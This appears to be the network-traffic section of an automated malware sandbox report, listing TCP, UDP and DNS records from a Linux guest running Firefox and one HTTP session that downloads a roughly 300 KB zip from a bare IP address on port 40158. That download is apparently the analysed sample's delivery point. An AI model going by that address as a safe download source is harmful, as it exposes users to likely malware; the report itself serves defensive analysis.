                                                                                                                                                                                                    Dec 19, 2024 15:48:12.081861973 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:12.081958055 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:12.221901894 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:12.221936941 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:13.540180922 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:13.540566921 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:13.541148901 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:13.541163921 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:13.541297913 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:13.541353941 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:13.672626972 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:13.719331980 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.047990084 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.048068047 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.048082113 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.048118114 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.049171925 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.049235106 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.049246073 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.089545012 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.168076038 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.168076038 CET40912443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.168102026 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.168112993 CET4434091234.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:15.545404911 CET43928443192.168.2.2391.189.91.42
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.285845995 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.285887957 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.285960913 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.298206091 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.298224926 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:35.513474941 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:35.513967991 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:35.514611006 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:35.514621973 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:35.514693022 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:35.514734983 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:35.524909019 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:35.571340084 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:36.009434938 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:36.009536028 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:36.009550095 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:36.009563923 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:36.009587049 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:36.033508062 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:36.033508062 CET40914443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:48:36.033534050 CET4434091434.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:49:16.046722889 CET40916443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:49:16.046760082 CET4434091634.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:49:16.046844006 CET40916443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:49:16.060818911 CET40916443192.168.2.2334.107.243.93
                                                                                                                                                                                                    Dec 19, 2024 15:49:16.060833931 CET4434091634.107.243.93192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:49:17.027591944 CET4434091634.107.243.93192.168.2.23

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.293138027 CET3631853192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.293216944 CET5449153192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.430874109 CET53544911.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.434858084 CET53363181.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.347584963 CET3991253192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.347640991 CET3728753192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.485431910 CET53372871.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.485780001 CET53399121.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.650882006 CET5425053192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.788264036 CET53542501.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.143039942 CET4192153192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.143039942 CET5192953192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.282371998 CET53419211.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.290234089 CET53519291.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.290489912 CET3641953192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.428138971 CET53364191.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:52.283651114 CET5283053192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:52.421003103 CET53528301.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.661084890 CET5436953192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.661267996 CET5341253192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.798566103 CET53543691.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.901736021 CET53534121.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.902081013 CET3828153192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:56.040220022 CET53382811.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:47:58.807030916 CET5945553192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:47:58.944637060 CET53594551.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:03.645418882 CET3592253192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:03.783349991 CET53359221.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:11.864041090 CET5422753192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:12.000946999 CET53542271.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.160223961 CET3795153192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.160303116 CET4304153192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.160440922 CET5703153192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.160500050 CET6031053192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.190891981 CET4284653192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.190953016 CET3866153192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.304778099 CET53570311.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.304972887 CET53379511.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.306484938 CET53430411.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328243017 CET53386611.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET53428461.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.355561972 CET5269853192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.355611086 CET5524553192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.457389116 CET53603101.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.492661953 CET53552451.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.493837118 CET53526981.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.534250975 CET5050053192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.534287930 CET3725353192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.564640999 CET4696353192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.564668894 CET4172753192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671596050 CET53372531.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671612024 CET53505001.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671814919 CET4938453192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.701689005 CET53417271.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.701706886 CET53469631.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.884021044 CET53493841.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.135704041 CET5072453192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.135936975 CET5926253192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.273200035 CET53592621.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.273289919 CET53507241.1.1.1192.168.2.23
                                                                                                                                                                                                    Dec 19, 2024 15:49:16.030375957 CET3907353192.168.2.231.1.1.1
                                                                                                                                                                                                    Dec 19, 2024 15:49:16.167752028 CET53390731.1.1.1192.168.2.23

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.293138027 CET192.168.2.231.1.1.10x94edStandard query (0)content-signature-2.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.293216944 CET192.168.2.231.1.1.10x64c5Standard query (0)content-signature-2.cdn.mozilla.net28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.347584963 CET192.168.2.231.1.1.10x70daStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.347640991 CET192.168.2.231.1.1.10x86b2Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.650882006 CET192.168.2.231.1.1.10x4262Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.143039942 CET192.168.2.231.1.1.10xebefStandard query (0)firefox.settings.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.143039942 CET192.168.2.231.1.1.10x2697Standard query (0)firefox.settings.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.290489912 CET192.168.2.231.1.1.10xe291Standard query (0)prod.remote-settings.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:52.283651114 CET192.168.2.231.1.1.10x358bStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.661084890 CET192.168.2.231.1.1.10xb86bStandard query (0)firefox-settings-attachments.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.661267996 CET192.168.2.231.1.1.10x4c45Standard query (0)firefox-settings-attachments.cdn.mozilla.net28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.902081013 CET192.168.2.231.1.1.10x6d9dStandard query (0)attachments.prod.remote-settings.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:58.807030916 CET192.168.2.231.1.1.10x82b9Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:03.645418882 CET192.168.2.231.1.1.10xe3c6Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:11.864041090 CET192.168.2.231.1.1.10x9f19Standard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.160223961 CET192.168.2.231.1.1.10x1444Standard query (0)www.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.160303116 CET192.168.2.231.1.1.10xc1d6Standard query (0)www.wikipedia.org28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.160440922 CET192.168.2.231.1.1.10x4f24Standard query (0)www.example.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.160500050 CET192.168.2.231.1.1.10xb5f6Standard query (0)www.example.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.190891981 CET192.168.2.231.1.1.10x7273Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.190953016 CET192.168.2.231.1.1.10x96a7Standard query (0)www.youtube.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.355561972 CET192.168.2.231.1.1.10x617fStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.355611086 CET192.168.2.231.1.1.10x4721Standard query (0)www.facebook.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.534250975 CET192.168.2.231.1.1.10xa055Standard query (0)www.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.534287930 CET192.168.2.231.1.1.10x9d35Standard query (0)www.reddit.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.564640999 CET192.168.2.231.1.1.10xc939Standard query (0)twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.564668894 CET192.168.2.231.1.1.10xafd5Standard query (0)twitter.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671814919 CET192.168.2.231.1.1.10x7d8dStandard query (0)reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.135704041 CET192.168.2.231.1.1.10xdf60Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.135936975 CET192.168.2.231.1.1.10x9eaStandard query (0)push.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:49:16.030375957 CET192.168.2.231.1.1.10x57e7Standard query (0)push.services.mozilla.com28IN (0x0001)false

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.430874109 CET1.1.1.1192.168.2.230x64c5No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.430874109 CET1.1.1.1192.168.2.230x64c5No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.430874109 CET1.1.1.1192.168.2.230x64c5No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.434858084 CET1.1.1.1192.168.2.230x94edNo error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.434858084 CET1.1.1.1192.168.2.230x94edNo error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:40.434858084 CET1.1.1.1192.168.2.230x94edNo error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:50.485780001 CET1.1.1.1192.168.2.230x70daNo error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.282371998 CET1.1.1.1192.168.2.230xebefNo error (0)firefox.settings.services.mozilla.comprod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.282371998 CET1.1.1.1192.168.2.230xebefNo error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:51.290234089 CET1.1.1.1192.168.2.230x2697No error (0)firefox.settings.services.mozilla.comprod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:52.238492966 CET1.1.1.1192.168.2.230xae59No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.798566103 CET1.1.1.1192.168.2.230xb86bNo error (0)firefox-settings-attachments.cdn.mozilla.netattachments.prod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.798566103 CET1.1.1.1192.168.2.230xb86bNo error (0)attachments.prod.remote-settings.prod.webservices.mozgcp.net34.117.121.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:47:55.901736021 CET1.1.1.1192.168.2.230x4c45No error (0)firefox-settings-attachments.cdn.mozilla.netattachments.prod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:03.645077944 CET1.1.1.1192.168.2.230xa97cNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:03.879427910 CET1.1.1.1192.168.2.230x5b03No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:03.879427910 CET1.1.1.1192.168.2.230x5b03No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.304778099 CET1.1.1.1192.168.2.230x4f24No error (0)www.example.com93.184.215.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.304972887 CET1.1.1.1192.168.2.230x1444No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.304972887 CET1.1.1.1192.168.2.230x1444No error (0)dyna.wikimedia.org185.15.58.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.306484938 CET1.1.1.1192.168.2.230xc1d6No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.306484938 CET1.1.1.1192.168.2.230xc1d6No error (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328243017 CET1.1.1.1192.168.2.230x96a7No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328243017 CET1.1.1.1192.168.2.230x96a7No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328243017 CET1.1.1.1192.168.2.230x96a7No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328243017 CET1.1.1.1192.168.2.230x96a7No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328243017 CET1.1.1.1192.168.2.230x96a7No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com172.217.21.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com142.250.181.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com142.250.181.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com142.250.181.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.328358889 CET1.1.1.1192.168.2.230x7273No error (0)youtube-ui.l.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.457389116 CET1.1.1.1192.168.2.230xb5f6No error (0)www.example.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.492661953 CET1.1.1.1192.168.2.230x4721No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.492661953 CET1.1.1.1192.168.2.230x4721No error (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.493837118 CET1.1.1.1192.168.2.230x617fNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.493837118 CET1.1.1.1192.168.2.230x617fNo error (0)star-mini.c10r.facebook.com157.240.196.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671596050 CET1.1.1.1192.168.2.230x9d35No error (0)www.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671612024 CET1.1.1.1192.168.2.230xa055No error (0)www.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671612024 CET1.1.1.1192.168.2.230xa055No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671612024 CET1.1.1.1192.168.2.230xa055No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671612024 CET1.1.1.1192.168.2.230xa055No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.671612024 CET1.1.1.1192.168.2.230xa055No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:14.701706886 CET1.1.1.1192.168.2.230xc939No error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Dec 19, 2024 15:48:34.273289919 CET1.1.1.1192.168.2.230xdf60No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • content-signature-2.cdn.mozilla.net
                                                                                                                                                                                                    • push.services.mozilla.com
                                                                                                                                                                                                    • firefox.settings.services.mozilla.com
                                                                                                                                                                                                    • firefox-settings-attachments.cdn.mozilla.net
                                                                                                                                                                                                    • 112.31.189.32:40158

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    0192.168.2.2339236112.31.189.3240158
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Dec 19, 2024 15:47:39.729543924 CET350OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: 112.31.189.32:40158
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                    Dec 19, 2024 15:47:41.395175934 CET120INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Content-Length: 307960
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: application/zip


                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    0192.168.2.233869434.160.144.191443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-12-19 14:47:42 UTC509OUTGET /chains/remote-settings.content-signature.mozilla.org-2021-09-19-15-17-11.chain HTTP/1.1
                                                                                                                                                                                                    Host: content-signature-2.cdn.mozilla.net
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                                                    Accept: */*
